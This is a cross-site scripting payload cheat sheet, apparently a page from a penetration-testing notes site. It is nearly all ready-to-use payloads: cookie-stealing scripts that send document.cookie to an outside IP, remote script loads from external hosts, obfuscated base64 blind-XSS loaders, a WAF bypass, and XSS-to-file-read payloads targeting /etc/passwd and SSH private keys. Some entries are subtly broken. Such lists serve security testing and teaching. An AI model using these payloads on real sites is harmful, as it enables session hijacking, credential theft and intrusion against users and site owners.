XSS

<script>alert(1)</script>

<Script>alert(1)</Script>

<sCript>alert(document.domain)</sCript>

<script>alert(123);</script>

<script>alert("test");</script>

<script>alert(document.cookie)</script>

</script><script>alert(document.cookie)</script>

javascript:alert(document.cookie)

javascript:prompt(document.cookie)

'-alert(document.cookie)-'

</script><svg onload=alert(document.cookie)>

"onmouseover=alert(document.cookie)//

{{$on.constructor('alert(1)')()}}

<Script>alert(document.cookie)</Script>

<sCript>alert(document.domain)</sCript>

<script>alert(document.cookie);</script>

<script>alert(document.cookie);</script>

<script>alert(document.domain)</script>

<script>alert(document.cookie)</script>

<script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>

<script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>

</script><script>alert(1)</script>

<img src="abc" onerror="alert(1)">

<img src="" onerror="alert(document.cookie)">

<img src='x' onerror='alert(document.cookie)' />

&lt;img src=0 onerror=alert(&#39;1&#39;)&gt;

&lt;img src=0 onerror=alert(document.cookie)&gt;

<svg/onload=alert(1)>

"><svg onload=alert(1)>

';alert('1');'

';alert('abc');'

<sc<script>ript>alert(1)</sc</script>ript>

<BODY ONLOAD=alert('1')>

<marquee onstart=alert(1)></marquee>

<audio src/onerror=alert(1)>

<audio src/onerror=prompt(123)>

<audio src/onerror=confirm(123)>

<script src="http://192.168.1.6/test.js" ></script>

<body onload=alert(123) >

<body onload=confirm(123) >

<body onload=prompt(123) >

--><svg/onload=alert(document.domain)>

--><body onload=alert(123) >

--><script>alert(1)</script>

--><img src=x onerror=alert(Gotcha)>

<iframe src='https://testforiframe.site/'>

"><iframe src='https://testforiframe.site/'>

"><script src="https://ee.xss.ht/"></script>

"><script>alert(document.domain)</script>

"><script>alert(document.domain + '\n' + "1")</script>

"><script>alert(document.domain + '\n' + "Name")</script>

"<img src='x' onerror='alert(10)' />"

https://brutelogic.com.br/poc.svg

http://xss.rocks/scriptlet.html

javascript:alert(document.cookie)

poc.svg = <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

"><script>alert(1)</script>

'or<script>alert(1)</script>

'or<img src=0 onerror=alert('1')>

<script <script>>alert('Gotcha')</script>

<audio src/onerror=alert('Gotcha')>

<iframe src=javascript:alert('Gotcha')>

<iframe src="javascript:alert(Gotcha)">

<img src=x onerror=alert(Gotcha)>

';alert(gotcha); //

<body onmouseover="print()">

<body onclick=print()>

<body onmessage=print()>

<iframe onload=print()></iframe>

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"\>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

<<SCRIPT>alert(document.cookie);//\<</SCRIPT>>

<iframe src=http://xss.rocks/scriptlet.html <

</script><script>alert(document.cookie);</script>

</TITLE><SCRIPT>alert(document.cookie);</SCRIPT>

<BODY ONLOAD=alert(document.cookie)>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>

<script>'-alert(1)-'</script>

'-alert(1)-'

></select><img%20src=1%20onerror=alert(1)>

{{$on.constructor('alert(1)')()}}

\"-alert(1)}//

<img src=1 onerror=print()>

"-top['al\x65rt']('sailay')-"

<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>

<img src="" onerror="innerHTML=decodeURIComponent.call`${location.hash}`" "="">

<img src="" onerror="location=/javascript:/.source+location" "="">

<img src="" onerror="window.onerror=alert;throw 1337" "="">

<img src="" onerror="alert&1par;1337&rpar;" "="">

<img src="" onerror="alert`1337`" "="">

javascript:alert(document.cookie)

"><img src=x onerror=alert(document.domain)>

"><script>alert(1)</script>

"><script>alert(document.domain)</script>

"><script>alert(document.cookie)</script>

"><script>prompt(1)</script>

"><script>prompt(document.domain)</script>

"><script>prompt(document.cookie)</script>

"><svg><script>alert(1)</script>

?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#<img src onerror=alert(1337)>

?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)

?s="onerror="window.onerror=alert;throw 1337"

?s="onerror="alert%261par;1337%26rpar;"

?s="onerror="alert`1337`"

<img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>

<link rel=attachment href="file:///etc/passwd">

<iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>

<IMG sRC=X onerror=jaVaScRipT:alert`xss`>

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E

<svg  xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>

<svg><style> <script>alert(1)</script> </style></svg>

<math><style> <img src onerror=alert(2)> </style></math>

XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:

URL query, fragment & path;
all input fields.

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

BlindXSS-Payloads: #Max Payload 5-7

  - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3Jgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vamVycnkuYnhzm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>'

  - "'><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS57ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>"

xss to lfi payload -

x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();
x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/passwd’);x.send();
get ssh private key -x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();

[Pinging the server down]

<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = https://attacker.com/ping?time=${time}ms;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">

PreviousXSS Cheat Sheet NextXSS -

Last updated 1 year ago